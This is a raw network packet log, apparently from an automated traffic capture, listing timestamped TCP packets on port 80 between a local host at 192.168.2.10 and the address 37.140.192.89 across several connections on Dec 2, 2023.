                                                                        Dec 2, 2023 18:49:53.556916952 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.775367022 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.784667969 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.784688950 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.784775019 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.785108089 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.785171986 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.785219908 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.785710096 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.785924911 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.785969973 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.786299944 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.786324978 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.786362886 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.786823988 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.786895037 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.786936045 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.004050016 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.004071951 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.004193068 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.004401922 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.004415989 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.004472971 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.004977942 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.004995108 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.005043030 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.005748034 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.005763054 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.005795002 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.006656885 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.006669998 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.006716013 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.008090973 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.008107901 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.008157015 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.008210897 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.008224964 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.008287907 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.009102106 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.009141922 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.009192944 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.010029078 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.010044098 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.010082960 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.010698080 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.010713100 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.010746956 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.222590923 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.222613096 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.222735882 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.222923994 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.222939014 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.223009109 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.223290920 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.223383904 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.223427057 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:54.223752022 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.223767042 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:54.223809004 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:55.071039915 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.087537050 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.307672024 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.307872057 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.308264971 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.528403997 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.536603928 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.536626101 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.536854982 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.537066936 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.537086010 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.537167072 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.537602901 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.537653923 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.537699938 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.538223982 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.538244009 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.538305044 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.538733006 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.538777113 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.538834095 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.757477045 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.757520914 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.757653952 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.757899046 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.757919073 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.757957935 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.758613110 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.758635998 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.758691072 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.759202003 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.759223938 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.759264946 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.759845018 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.759864092 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.760013103 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.760515928 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.760623932 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.760668993 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.761149883 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.761177063 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.761220932 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.761924982 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.761949062 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.761991978 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.762659073 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.762685061 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.762747049 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.763029099 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.763111115 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.763155937 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.977705956 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.977740049 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.977865934 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.977904081 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.977982998 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.978043079 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.978312016 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.978331089 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.978380919 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:56.978598118 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.978625059 CET804972237.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:56.978676081 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:57.820852995 CET4972280192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.069753885 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.288394928 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.288563967 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.288974047 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.507673025 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.515948057 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.515973091 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.516079903 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.516318083 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.516483068 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.516539097 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.516968012 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.517009974 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.517055035 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.517668962 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.517688990 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.517744064 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.518271923 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.518295050 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.518332005 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.734391928 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.734414101 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.734556913 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.734682083 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.734704018 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.734749079 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.735066891 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735086918 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735129118 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.735407114 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735424995 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735462904 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.735743999 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735761881 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.735800028 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736120939 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736140966 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736193895 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736449003 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736469030 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736512899 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.736896038 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736913919 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.736951113 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.737270117 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737287045 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737333059 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.737605095 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737643957 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.737693071 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.952867985 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.952894926 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.952961922 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953140020 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953185081 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953218937 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953490019 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953507900 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953550100 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:59.953835011 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953855038 CET804972337.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:59.953906059 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:00.847038031 CET4972380192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:01.852623940 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.074076891 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.074220896 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.074521065 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.294306040 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294822931 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294840097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.294924974 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295180082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295196056 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295255899 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295440912 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295531034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295572996 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.295792103 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295809984 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.295847893 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.296099901 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.296118021 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.296152115 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.515168905 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515196085 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515315056 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.515466928 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515506983 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.515573025 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.516094923 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516115904 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516165972 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.516577005 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516594887 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.516634941 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517004013 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517023087 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517076015 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517523050 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517540932 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.517585993 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.517993927 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.518016100 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.518059969 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519334078 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519351006 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519395113 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519399881 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519418955 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519473076 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.519845009 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519864082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.519915104 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.735522985 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735543966 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735589981 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.735852003 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735866070 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.735909939 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.736315966 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736329079 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736376047 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.736824036 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736877918 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.736918926 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.737330914 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.737344027 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.737386942 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.738214970 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738229036 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738281965 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.738645077 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738660097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.738698959 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.739499092 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.739514112 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.739552975 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.740014076 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740030050 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740072966 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.740545034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740559101 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.740603924 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741038084 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741051912 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741091013 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741600037 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741614103 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741655111 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.741970062 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.741982937 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742026091 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.742397070 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742456913 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742494106 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.742968082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.742981911 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743020058 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.743577003 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743597031 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743649006 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.743834019 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743853092 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.743900061 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.744313002 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744513035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744565964 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.744771957 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744786024 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.744822979 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.745286942 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.745300055 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.745338917 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.955713034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.955775023 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.955828905 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.956059933 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956078053 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956118107 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.956578970 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956593990 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.956628084 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957001925 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957019091 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957052946 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957371950 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957386017 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957432032 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.957703114 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957717896 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.957751036 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958007097 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958023071 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958070040 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958399057 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958414078 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958448887 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.958719969 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958734035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.958775043 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959068060 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959084988 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959119081 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959378004 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959392071 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959425926 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.959673882 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959687948 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.959722042 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960011005 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960025072 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960063934 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960315943 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960331917 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960371971 CET4972480192.168.2.1037.140.192.89
